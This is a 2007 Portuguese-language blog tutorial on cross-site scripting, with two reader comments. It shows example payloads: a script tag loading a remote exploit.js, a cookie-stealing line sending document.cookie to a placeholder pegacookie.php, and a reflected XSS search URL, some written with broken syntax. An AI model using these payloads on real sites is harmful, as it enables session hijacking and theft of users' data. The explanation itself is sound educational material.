Segurança em Web-Sites. (Parte 2-XSS)

Vamos então a parte 2 de nosso tuto de segurança em web-pages xD

O XSS-Exploit (Cross Site Scripting) não é nada mais nada menos que inserir scripts ou tiras destes em uma pagina, na maioria das vezes através de posts ou comentarios que são enviados e agregados ao HTML da página.

Imagine só se o hacker resolve carregar um código malicioso em sua página através de um javascript em outra pagina e então junto com seu comentario posta uma tag script:
Oi <script src=”www.site.com/exploit.js“</script> galera ! Blz?

Quando a pagina com o post for carregada o script se executará e um virus por exemplo pode ser inserido na maquina via JS ou VBscript (sim, incrivel, mas da xD).
O que mais acontece é o hacker pegar o cookie do usuário e salvar atravéz deste script. Mas num tem problema pq meu cookie ta criptografado!!!

Nein Nein!!!! Não são todos os sites que criptografam senhas!! mesmo criptografando-as, elas podem ainda ser descriptografadas diretamente (no caso de criptografia síncrona) ou por força bruta (no caso da assíncrona), sem falar que dependendo das informações no cookie a sua privacidade vai pras cucuias xD.

Para ver seu proprio cookie na pagina que vc esta acessando eh facil, apenas execute um javascript na barra de endereços:
javascript:alert(document.cookie);

…e ta ai seu cookie do site que você está xD
O script que pega o cookie e armazena no site funciona associado a um php ou asp, veja o que contem no script exploit.js:
window.location = http://www.site.com/pegacookie.php?cookie=”+document.cookie;

E está salvo seu cookie atravez de um simples php usando metodo GET =S

Mas isto não acontece só em posts mas tambem em GETs como por exemplo neste link:
www.site.com?buscador.php?busca=alguma+coisa+<script>Alert(”alo!”);</script>

Neste exemplo a variavel busca vai ser passada para o servidor e repassada de volta para o cliente e o script será executado por que estará agregado ao HTML xD
Então podemos perceber que o metodo pra salvar cookies aqui tb funciona se codificarmos a string em URLencode.
Espero que tenham gostado XD

Até a proxima!

~ por duzao7667 em 18 Agosto, 2007.

Publicado em Informatica, Programação, Segurança, Truques

2 Respostas to “Segurança em Web-Sites. (Parte 2-XSS)”

  1. daora gostei muito , obrigado fica com God

    Rafael disse isso em 20 Março, 2008 às 1:40 pm | Responder

  2. Fala Duzão….

    Ae, gostei dos seus artigos, li os 3, e curti as dicas.
    Trabalho com desenvolvimento de sites e é bom saber q podemos evitar cagadas de vez em quando..ueheuheue

    Uma dica ae legal, relacionar os principais `problemas`, ou portas de ataque, e dar uma possivel solução!!

    Fazer uma relação legal desses problemas, q é legal.!!!

    Gostei do blog, vai achando q nao tem ninguém q acessa, q nem vc disse;…euheuehe

    Abrass

    Henrique disse isso em 16 Maio, 2008 às 12:50 am | Responder

Deixe uma resposta